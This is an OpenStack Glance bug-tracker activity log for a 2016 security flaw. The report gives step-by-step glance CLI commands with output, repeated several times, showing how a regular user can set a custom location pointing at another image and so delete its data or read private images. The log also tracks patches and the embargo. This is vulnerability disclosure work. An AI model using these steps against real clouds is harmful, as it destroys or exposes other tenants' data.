Glance

  1. Series newton
  2. Bug #1546507
  3. Activity log

Activity log for bug #1546507

Date Who What changed Old value New value Message
2016-02-17 12:16:38 Mike Fedosin bug added bug
2016-02-17 13:23:53 Tristan Cacqueray bug task added ossa
2016-02-17 13:24:36 Tristan Cacqueray description Any user can delete any public image data or get access to private image just knowing the image id. Glance allows to add custom location to image and this behavior is really harmful. Scenario of deleting image data in Ceph backend with current devstack configuration 1. User gets list of images: mfedosin@winter ~ $ glance image-list +--------------------------------------+----------------------------+ | ID | Name | +--------------------------------------+----------------------------+ | 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2 | | 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM | | 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker | | 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes | +--------------------------------------+----------------------------+ 2. User requests info about public image he wants to delete: mfedosin@winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de +------------------+----------------------------------------------------------------------------------+ | Property | Value | +------------------+----------------------------------------------------------------------------------+ | checksum | ee1eca47dc88f4879d8a229cc70a07c6 | | container_format | bare | | created_at | 2016-02-11T03:38:09Z | | direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- | | | 4463cd7038de/snap | | disk_format | qcow2 | | id | 2e4b6dca-9700-4715-b81d-4463cd7038de | | min_disk | 0 | | min_ram | 64 | | name | TestVM | | owner | 1c6cea59a6054372b10acbab8e25e415 | | protected | False | | size | 13287936 | | status | active | | tags | [] | | updated_at | 2016-02-11T03:38:30Z | | virtual_size | None | | visibility | public | +------------------+----------------------------------------------------------------------------------+ Optional: User may try to download image file with "glance image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg" 3. User copies direct image url: from 'direct_url' or 'locations' field rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap 4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2) mfedosin@winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2016-02-17T11:54:41.000000 | | deleted | False | | deleted_at | None | | disk_format | qcow2 | | id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | rerere | | owner | fa343a042d2b47cbbeab08cca9913679 | | protected | False | | size | 13287936 | | status | active | | updated_at | 2016-02-17T11:54:44.000000 | | virtual_size | None | +------------------+--------------------------------------+ Optional: User may try to verify that image has desired location mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2 +------------------+----------------------------------------------------------------------------------+ | Property | Value | +------------------+----------------------------------------------------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2016-02-17T11:54:41Z | | direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- | | | 4463cd7038de/snap | | disk_format | qcow2 | | id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 | | min_disk | 0 | | min_ram | 0 | | name | rerere | | owner | fa343a042d2b47cbbeab08cca9913679 | | protected | False | | size | 13287936 | | status | active | | tags | [] | | updated_at | 2016-02-17T11:54:44Z | | virtual_size | None | | visibility | private | +------------------+----------------------------------------------------------------------------------+ 5. User deletes his image. Image data will be deleted too. glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2 mfedosin@winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2 mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2 404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404) 6. Trying to access public data will failed after that. mfedosin@winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file HTTP/1.1 204 No Content Date: Wed, 17 Feb 2016 12:01:54 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main args.func(client, args) File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download utils.save_image(body, args.file) File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image for chunk in data: File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__ self.iterable.close() AttributeError: 'NoneType' object has no attribute 'close' 'NoneType' object has no attribute 'close' mfedosin@winter ~ $ glance --version 1.2.0 Affected apis: all v1 api without any chance to fix it - v1 always allows to set custom locations. v2 api when 'show_multiple_locations' is enabled (default - False) Affected schemes: All, except 'swift+config' and 'file', because custom locations are forbidden for them. If user knows private image id he can build and set custom location to his personal image, therefore get an access to private data. This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. Any user can delete any public image data or get access to private image just knowing the image id. Glance allows to add custom location to image and this behavior is really harmful. Scenario of deleting image data in Ceph backend with current devstack configuration 1. User gets list of images: mfedosin@winter ~ $ glance image-list +--------------------------------------+----------------------------+ | ID | Name | +--------------------------------------+----------------------------+ | 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2 | | 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM | | 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker | | 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes | +--------------------------------------+----------------------------+ 2. User requests info about public image he wants to delete: mfedosin@winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de +------------------+----------------------------------------------------------------------------------+ | Property | Value | +------------------+----------------------------------------------------------------------------------+ | checksum | ee1eca47dc88f4879d8a229cc70a07c6 | | container_format | bare | | created_at | 2016-02-11T03:38:09Z | | direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- | | | 4463cd7038de/snap | | disk_format | qcow2 | | id | 2e4b6dca-9700-4715-b81d-4463cd7038de | | min_disk | 0 | | min_ram | 64 | | name | TestVM | | owner | 1c6cea59a6054372b10acbab8e25e415 | | protected | False | | size | 13287936 | | status | active | | tags | [] | | updated_at | 2016-02-11T03:38:30Z | | virtual_size | None | | visibility | public | +------------------+----------------------------------------------------------------------------------+ Optional: User may try to download image file with "glance image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg" 3. User copies direct image url: from 'direct_url' or 'locations' field rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap 4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2) mfedosin@winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2016-02-17T11:54:41.000000 | | deleted | False | | deleted_at | None | | disk_format | qcow2 | | id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | rerere | | owner | fa343a042d2b47cbbeab08cca9913679 | | protected | False | | size | 13287936 | | status | active | | updated_at | 2016-02-17T11:54:44.000000 | | virtual_size | None | +------------------+--------------------------------------+ Optional: User may try to verify that image has desired location mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2 +------------------+----------------------------------------------------------------------------------+ | Property | Value | +------------------+----------------------------------------------------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2016-02-17T11:54:41Z | | direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- | | | 4463cd7038de/snap | | disk_format | qcow2 | | id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 | | min_disk | 0 | | min_ram | 0 | | name | rerere | | owner | fa343a042d2b47cbbeab08cca9913679 | | protected | False | | size | 13287936 | | status | active | | tags | [] | | updated_at | 2016-02-17T11:54:44Z | | virtual_size | None | | visibility | private | +------------------+----------------------------------------------------------------------------------+ 5. User deletes his image. Image data will be deleted too. glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2 mfedosin@winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2 mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2 404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404) 6. Trying to access public data will failed after that. mfedosin@winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file HTTP/1.1 204 No Content Date: Wed, 17 Feb 2016 12:01:54 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd Traceback (most recent call last):   File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main     args.func(client, args)   File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download     utils.save_image(body, args.file)   File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image     for chunk in data:   File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__     self.iterable.close() AttributeError: 'NoneType' object has no attribute 'close' 'NoneType' object has no attribute 'close' mfedosin@winter ~ $ glance --version 1.2.0 Affected apis: all v1 api without any chance to fix it - v1 always allows to set custom locations. v2 api when 'show_multiple_locations' is enabled (default - False) Affected schemes: All, except 'swift+config' and 'file', because custom locations are forbidden for them. If user knows private image id he can build and set custom location to his personal image, therefore get an access to private data.
2016-02-17 13:24:40 Tristan Cacqueray ossa: status New Incomplete
2016-02-17 13:24:59 Tristan Cacqueray bug added subscriber Glance Core security contacts
2016-02-18 01:56:52 Mike Fedosin attachment added Prevent setting locations to external images https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4574017/+files/0001-Prevent-setting-locations-to-external-images.patch
2016-02-22 15:07:28 Tristan Cacqueray ossa: status Incomplete Confirmed
2016-02-22 15:07:41 Tristan Cacqueray ossa: importance Undecided Critical
2016-02-29 13:11:28 Mike Fedosin attachment added Updated version of previous patch https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4584339/+files/0001-Prevent-setting-locations-to-external-images.patch
2016-03-10 17:00:59 Hemanth Makkapati bug added subscriber Hemanth Makkapati
2016-04-06 12:13:46 Tristan Cacqueray bug added subscriber Tony Breeds
2016-05-02 19:16:52 Tristan Cacqueray ossa: status Confirmed Opinion
2016-05-11 15:54:11 Mike Fedosin attachment added Version with policies https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4660762/+files/0001-Prevent-setting-locations-to-external-images.patch
2016-05-18 18:47:35 Mike Fedosin attachment added Version that allows snap-style rbd urls https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4665718/+files/0001-Prevent-setting-locations-to-external-images.patch
2016-05-31 19:45:24 Nikhil Komawar bug added subscriber Nova Core security contacts
2016-08-04 12:30:48 Mike Fedosin bug added subscriber Adam Heczko
2016-08-04 12:31:57 Mike Fedosin removed subscriber Adam Heczko
2016-08-04 12:32:12 Mike Fedosin bug added subscriber Adam Heczko
2016-08-30 14:32:19 Nikhil Komawar bug added subscriber Ian Cordasco
2016-08-31 01:57:57 Nikhil Komawar bug added subscriber Sabari Murugesan
2016-11-01 15:06:08 Ian Cordasco nominated for series glance/liberty
2016-11-01 15:06:08 Ian Cordasco bug task added glance/liberty
2016-11-01 15:06:08 Ian Cordasco nominated for series glance/ocata
2016-11-01 15:06:08 Ian Cordasco bug task added glance/ocata
2016-11-01 15:06:08 Ian Cordasco nominated for series glance/newton
2016-11-01 15:06:08 Ian Cordasco bug task added glance/newton
2016-11-01 15:06:08 Ian Cordasco nominated for series glance/mitaka
2016-11-01 15:06:08 Ian Cordasco bug task added glance/mitaka
2016-11-04 13:09:44 Brian Rosmaita bug added subscriber Fei Long Wang
2016-11-07 09:08:19 Feilong Wang glance/liberty: status New Confirmed
2016-11-08 13:59:52 Ian Cordasco glance/newton: status New Confirmed
2016-11-08 13:59:55 Ian Cordasco glance/mitaka: status New Confirmed
2016-11-08 13:59:58 Ian Cordasco glance/newton: importance Undecided Critical
2016-11-08 14:00:00 Ian Cordasco glance/mitaka: importance Undecided Critical
2016-11-08 14:00:02 Ian Cordasco glance/liberty: importance Undecided Critical
2016-11-10 13:42:06 Brian Rosmaita bug added subscriber Matthew Oliver
2016-11-10 13:42:50 Brian Rosmaita bug added subscriber Tomoki Sekiyama
2016-11-10 13:43:14 Brian Rosmaita bug added subscriber YAMADA Hideki
2016-11-10 20:33:18 Brian Rosmaita summary Regular user can delete any image file Regular user in non-default non-recommended configuration can delete any image file
2016-11-15 07:39:34 Tomoki Sekiyama attachment added Additional patch for cinder store https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4777557/+files/cinder-store-check-image-owner.patch
2016-11-16 01:47:31 Feilong Wang attachment added 0001-Avoid-deleting-location-data-if-current-image-is-not.patch https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4777912/+files/0001-Avoid-deleting-location-data-if-current-image-is-not.patch
2016-11-16 02:54:16 Tomoki Sekiyama attachment added Additional patch for cinder store (v2) https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4777917/+files/cinder-store-check-image-owner.patch
2016-11-17 12:31:16 Mike Fedosin attachment added 0001-Prevent-setting-locations-to-other-images.patch https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4778616/+files/0001-Prevent-setting-locations-to-other-images.patch
2016-11-21 00:31:43 Feilong Wang attachment added Fix for incurred case https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4780748/+files/0001-Avoid-deleting-location-data-if-current-image-is-not.patch
2016-12-08 04:03:51 Feilong Wang attachment added Fix based on the work of Mike and Feilong https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4788885/+files/0001-Prevent-setting-locations-to-other-images.patch
2017-01-25 15:49:14 Brian Rosmaita bug added subscriber Anton Chevychalov
2017-01-31 02:50:22 Tomoki Sekiyama attachment added Additional patch for cinder store (v3) https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4811149/+files/0001-Raise-exception.Forbidden-on-get_size-of-another-pro.patch
2017-05-12 13:38:46 Mike Fedosin bug added subscriber Anton Arefiev
2017-05-25 14:34:19 Brian Rosmaita removed subscriber Hemanth Makkapati
2017-05-26 04:09:39 Brian Rosmaita attachment added spec for a proposed fix https://bugs.launchpad.net/glance/+bug/1546507/+attachment/4883799/+files/0001-DO-NOT-GIT-REVIEW-This-must-be-reviewed-on-the-bug-r.patch
2017-05-30 15:43:04 Brian Rosmaita bug added subscriber Hemanth Makkapati
2017-09-22 13:06:41 Mike Fedosin bug added subscriber Andreas Stieger
2017-09-22 13:07:11 Mike Fedosin bug added subscriber Robert Simai
2017-09-25 18:25:05 Tristan Cacqueray bug task added ossn
2018-08-06 23:59:48 Jeremy Stanley bug added subscriber OSSG CoreSec
2018-08-10 15:14:35 Jeremy Stanley information type Private Security Public
2018-08-10 15:14:47 Jeremy Stanley tags security
2018-08-10 15:15:09 Jeremy Stanley ossa: importance Critical Undecided
2018-08-20 05:02:57 Summer Long bug added subscriber Summer Long
2019-08-29 19:57:29 Jeremy Stanley description This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. Any user can delete any public image data or get access to private image just knowing the image id. Glance allows to add custom location to image and this behavior is really harmful. Scenario of deleting image data in Ceph backend with current devstack configuration 1. User gets list of images: mfedosin@winter ~ $ glance image-list +--------------------------------------+----------------------------+ | ID | Name | +--------------------------------------+----------------------------+ | 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2 | | 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM | | 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker | | 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes | +--------------------------------------+----------------------------+ 2. User requests info about public image he wants to delete: mfedosin@winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de +------------------+----------------------------------------------------------------------------------+ | Property | Value | +------------------+----------------------------------------------------------------------------------+ | checksum | ee1eca47dc88f4879d8a229cc70a07c6 | | container_format | bare | | created_at | 2016-02-11T03:38:09Z | | direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- | | | 4463cd7038de/snap | | disk_format | qcow2 | | id | 2e4b6dca-9700-4715-b81d-4463cd7038de | | min_disk | 0 | | min_ram | 64 | | name | TestVM | | owner | 1c6cea59a6054372b10acbab8e25e415 | | protected | False | | size | 13287936 | | status | active | | tags | [] | | updated_at | 2016-02-11T03:38:30Z | | virtual_size | None | | visibility | public | +------------------+----------------------------------------------------------------------------------+ Optional: User may try to download image file with "glance image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg" 3. User copies direct image url: from 'direct_url' or 'locations' field rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap 4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2) mfedosin@winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2016-02-17T11:54:41.000000 | | deleted | False | | deleted_at | None | | disk_format | qcow2 | | id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | rerere | | owner | fa343a042d2b47cbbeab08cca9913679 | | protected | False | | size | 13287936 | | status | active | | updated_at | 2016-02-17T11:54:44.000000 | | virtual_size | None | +------------------+--------------------------------------+ Optional: User may try to verify that image has desired location mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2 +------------------+----------------------------------------------------------------------------------+ | Property | Value | +------------------+----------------------------------------------------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2016-02-17T11:54:41Z | | direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- | | | 4463cd7038de/snap | | disk_format | qcow2 | | id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 | | min_disk | 0 | | min_ram | 0 | | name | rerere | | owner | fa343a042d2b47cbbeab08cca9913679 | | protected | False | | size | 13287936 | | status | active | | tags | [] | | updated_at | 2016-02-17T11:54:44Z | | virtual_size | None | | visibility | private | +------------------+----------------------------------------------------------------------------------+ 5. User deletes his image. Image data will be deleted too. glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2 mfedosin@winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2 mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2 404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404) 6. Trying to access public data will failed after that. mfedosin@winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file HTTP/1.1 204 No Content Date: Wed, 17 Feb 2016 12:01:54 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd Traceback (most recent call last):   File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main     args.func(client, args)   File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download     utils.save_image(body, args.file)   File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image     for chunk in data:   File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__     self.iterable.close() AttributeError: 'NoneType' object has no attribute 'close' 'NoneType' object has no attribute 'close' mfedosin@winter ~ $ glance --version 1.2.0 Affected apis: all v1 api without any chance to fix it - v1 always allows to set custom locations. v2 api when 'show_multiple_locations' is enabled (default - False) Affected schemes: All, except 'swift+config' and 'file', because custom locations are forbidden for them. If user knows private image id he can build and set custom location to his personal image, therefore get an access to private data. Any user can delete any public image data or get access to private image just knowing the image id. Glance allows to add custom location to image and this behavior is really harmful. Scenario of deleting image data in Ceph backend with current devstack configuration 1. User gets list of images: mfedosin@winter ~ $ glance image-list +--------------------------------------+----------------------------+ | ID | Name | +--------------------------------------+----------------------------+ | 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2 | | 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM | | 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker | | 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes | +--------------------------------------+----------------------------+ 2. User requests info about public image he wants to delete: mfedosin@winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de +------------------+----------------------------------------------------------------------------------+ | Property | Value | +------------------+----------------------------------------------------------------------------------+ | checksum | ee1eca47dc88f4879d8a229cc70a07c6 | | container_format | bare | | created_at | 2016-02-11T03:38:09Z | | direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- | | | 4463cd7038de/snap | | disk_format | qcow2 | | id | 2e4b6dca-9700-4715-b81d-4463cd7038de | | min_disk | 0 | | min_ram | 64 | | name | TestVM | | owner | 1c6cea59a6054372b10acbab8e25e415 | | protected | False | | size | 13287936 | | status | active | | tags | [] | | updated_at | 2016-02-11T03:38:30Z | | virtual_size | None | | visibility | public | +------------------+----------------------------------------------------------------------------------+ Optional: User may try to download image file with "glance image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg" 3. User copies direct image url: from 'direct_url' or 'locations' field rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap 4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2) mfedosin@winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2016-02-17T11:54:41.000000 | | deleted | False | | deleted_at | None | | disk_format | qcow2 | | id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | rerere | | owner | fa343a042d2b47cbbeab08cca9913679 | | protected | False | | size | 13287936 | | status | active | | updated_at | 2016-02-17T11:54:44.000000 | | virtual_size | None | +------------------+--------------------------------------+ Optional: User may try to verify that image has desired location mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2 +------------------+----------------------------------------------------------------------------------+ | Property | Value | +------------------+----------------------------------------------------------------------------------+ | checksum | None | | container_format | bare | | created_at | 2016-02-17T11:54:41Z | | direct_url | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d- | | | 4463cd7038de/snap | | disk_format | qcow2 | | id | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 | | min_disk | 0 | | min_ram | 0 | | name | rerere | | owner | fa343a042d2b47cbbeab08cca9913679 | | protected | False | | size | 13287936 | | status | active | | tags | [] | | updated_at | 2016-02-17T11:54:44Z | | virtual_size | None | | visibility | private | +------------------+----------------------------------------------------------------------------------+ 5. User deletes his image. Image data will be deleted too. glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2 mfedosin@winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2 mfedosin@winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2 404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404) 6. Trying to access public data will failed after that. mfedosin@winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file HTTP/1.1 204 No Content Date: Wed, 17 Feb 2016 12:01:54 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd Traceback (most recent call last):   File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main     args.func(client, args)   File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download     utils.save_image(body, args.file)   File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image     for chunk in data:   File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__     self.iterable.close() AttributeError: 'NoneType' object has no attribute 'close' 'NoneType' object has no attribute 'close' mfedosin@winter ~ $ glance --version 1.2.0 Affected apis: all v1 api without any chance to fix it - v1 always allows to set custom locations. v2 api when 'show_multiple_locations' is enabled (default - False) Affected schemes: All, except 'swift+config' and 'file', because custom locations are forbidden for them. If user knows private image id he can build and set custom location to his personal image, therefore get an access to private data.